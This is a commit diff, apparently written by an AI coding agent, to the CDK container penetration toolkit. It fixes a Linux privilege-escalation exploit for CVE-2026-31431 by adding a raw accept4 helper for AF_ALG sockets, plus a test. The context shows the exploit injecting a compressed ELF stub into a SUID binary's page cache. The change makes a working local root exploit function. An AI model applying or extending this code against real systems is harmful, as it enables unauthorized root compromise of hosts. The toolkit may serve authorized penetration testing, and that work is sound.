Fix algAccept comment: accept4(fd, NULL, 0, 0) not accept4(fd, NULL, NULL, 0)

Agent-Logs-Url: https://github.com/cdk-team/CDK/sessions/b3009290-e156-47de-a1ed-f77845c1b4e4

Co-authored-by: neargle <7868679+neargle@users.noreply.github.com>

Author: Copilot

pkg/exploit/privilege_escalation/copy_fail_cve_2026_31431.go

@@ -52,6 +52,19 @@ import (
 	"golang.org/x/sys/unix"
 )
 
+// algAccept creates an AF_ALG operation socket by calling accept4 with a NULL
+// peer-address pointer.  This is required because unix.Accept passes a non-NULL
+// address buffer which triggers a getname() call on the newly created socket;
+// since AF_ALG sockets do not implement getname, the kernel returns ECONNABORTED.
+// Calling accept4(fd, NULL, 0, 0) skips the getname step entirely.
+func algAccept(algFd int) (int, error) {
+	r, _, errno := syscall.Syscall6(syscall.SYS_ACCEPT4, uintptr(algFd), 0, 0, 0, 0, 0)
+	if errno != 0 {
+		return -1, errno
+	}
+	return int(r), nil
+}
+
 // copyFailPayloadHex is a zlib-compressed ELF64 little-endian binary stub
 // (160 bytes uncompressed) to be injected into the SUID target's page cache.
 // The stub starts with a valid ELF64/x86-64 header (magic 0x7fELF, class 2,
@@ -142,7 +155,11 @@ func copyFailWriteChunk(fd int, offset int, chunk []byte) error {
 	}
 
 	// Accept returns the operation socket used for actual encrypt/decrypt calls.
-	opFd, _, err := unix.Accept(algFd)
+	// We must use algAccept (raw accept4 with NULL addr) rather than unix.Accept,
+	// because unix.Accept passes a non-NULL peer-address buffer which causes the
+	// kernel to call getname() on the new AF_ALG socket.  AF_ALG does not
+	// implement getname, so the kernel returns ECONNABORTED when addr is non-NULL.
+	opFd, err := algAccept(algFd)
 	if err != nil {
 		return fmt.Errorf("accept: %v", err)
 	}

pkg/exploit/privilege_escalation/copy_fail_cve_2026_31431_test.go

@@ -92,3 +92,25 @@ func TestCopyFailPluginRegistered(t *testing.T) {
 	assert.NotEmpty(t, exploit.Desc())
 	assert.Contains(t, exploit.Desc(), "CVE-2026-31431")
 }
+
+// TestAlgAccept verifies that algAccept successfully creates an AF_ALG
+// operation socket for a hash algorithm by calling accept4 with a NULL
+// peer-address pointer, avoiding the ECONNABORTED that unix.Accept would
+// trigger via its internal getname() call on the AF_ALG socket.
+func TestAlgAccept(t *testing.T) {
+	algFd, err := unix.Socket(unix.AF_ALG, unix.SOCK_SEQPACKET, 0)
+	if err != nil {
+		t.Skipf("AF_ALG not available: %v", err)
+	}
+	defer unix.Close(algFd)
+
+	sa := &unix.SockaddrALG{Type: "hash", Name: "sha256"}
+	if err := unix.Bind(algFd, sa); err != nil {
+		t.Skipf("AF_ALG hash bind not available: %v", err)
+	}
+
+	opFd, err := algAccept(algFd)
+	require.NoError(t, err, "algAccept must succeed; unix.Accept would return ECONNABORTED here")
+	assert.Greater(t, opFd, 0, "operation fd must be positive")
+	unix.Close(opFd)
+}